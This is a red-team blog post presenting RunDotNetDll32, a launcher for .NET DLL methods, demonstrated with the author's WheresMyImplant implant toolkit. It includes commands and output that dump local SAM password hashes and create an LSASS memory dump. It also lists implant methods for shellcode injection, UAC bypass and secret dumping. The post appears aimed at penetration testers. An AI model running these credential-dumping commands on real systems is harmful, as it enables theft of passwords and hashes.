Back
Executing .NET Methods with RunDotNetDll32
For DerbyCon 2017 I released a mini red team toolkit in the form of a .Net DLL named WheresMyImplant. Since then I’ve been expanding its functionality to continue development on it. As part of the effort I needed a way to quickly execute .NET methods from an existing DLL. However, to the best of my knowledge there was no nice way of doing that without using PowerShell or .net SmokeTest. So I created RunDotNetDll32 for that purpose.
In this blog I’ll provide an overview of what RunDotNetDll32 does and some common usage examples.
Introduction to RunDotNetDll32
Below is a basic example command showing how to use PowerShell to load the .NET DLL WheresMyImplant.dll so that the DumpSAM() function can be executed to recover local password hashes.
[System.Reflection.Assembly]::Load("WheresMyImplant.dll")
[WheresMyImplant.Implant]::DumpSAM()
[System.Reflection.Assembly]::Unload("WheresMyImplant.dll")
As you can see, PowerShell can be a great medium for executing .NET methods reflectively. However, this can become a bit cumbersome during testing and isn’t ideal for executing client side.
Enter RunDotNetDll32; this executable has one purpose, to duplicate the functionality of rundll32 for .Net assemblies. Syntactically it is very similar to rundll32.exe. For example, if you wanted to execute the pre-mimikatz trick of locking the workstation and keylogging the winlogon process, it would start with the following command:
rundll32.exe User32.dll,LockWorkStation
Where the syntax is:
rundll32.exe $ASSEMBLY,$ENTRYPOINT $ARGUMENTS
With RunDotNetDll32 the syntax had to be slightly modified to the following:
rundotnetdll32.exe $ASSEMBLY,$NAMESPACE,$CLASS,$METHOD $ARGUMENTS
For example, to run the SAM hashdump from WheresMyImplant you could use the command below:
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Implant,DumpSAM ---------- Namespace: WheresMyImplant Class: Implant Method: DumpSAM Arguments: ---------- [+] Running as SYSTEM Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0::: Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Similarly, the MiniDump method can be run from WheresMyImplant:
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Implant,MiniDump 552,lsass.dmp ---------- Namespace: WheresMyImplant Class: Implant Method: MiniDump Arguments: 552 lsass.dmp ---------- [+] Received Handle: 512 [+] Dump File Created
Enumerating Namespaces, Classes and Methods
It was pointed out to me early on that it’s not intuitive to have to remember every namespace, class, and method in an assembly. So the functionality to list namespaces, classes, and methods was rolled in.
Below are some basic examples:
Listing Namespaces
rundotnetdll32.exe WheresMyImplant.dll list namespaces WheresMyImplant
Listing Classes
rundotnetdll32.exe WheresMyImplant.dll list classes
WheresMyImplant
[TRUNCATED]
RunCommandPrompt
ntdll
LSASecrets
InjectDll
MyInstall
Implant
BaseSQL
RunXPCmdShell
Advapi32
[TRUNCATED]
Listing Methods
rundotnetdll32.exe WheresMyImplant.dll list methods WheresMyImplant Implant
WheresMyImplant
Implant
RunCMD
RunPowerShell
RunXpCmdShell
InjectShellCode
InjectShellCodeWMIFSB64
InjectDll
InjectDllWMIFS
InjectPeFile
InjectPeString
InjectPeWMIFS
InjectPeWMIFSRemote
Empire
Tokenvator
BypassUac
DumpLsa
DumpSAM
DumpDomainCache
DumpVault
DumpVaultCLI
ReadProcessMemory
CheckCCNumber
MiniDump
PSExec
WirelessPreSharedKey
[TRUNCATED]
I made this program for myself and the team, but hopefully it will be useful to blue and red team members developing .NET applications. If you have any bugs or commits let me know. Both are welcome.
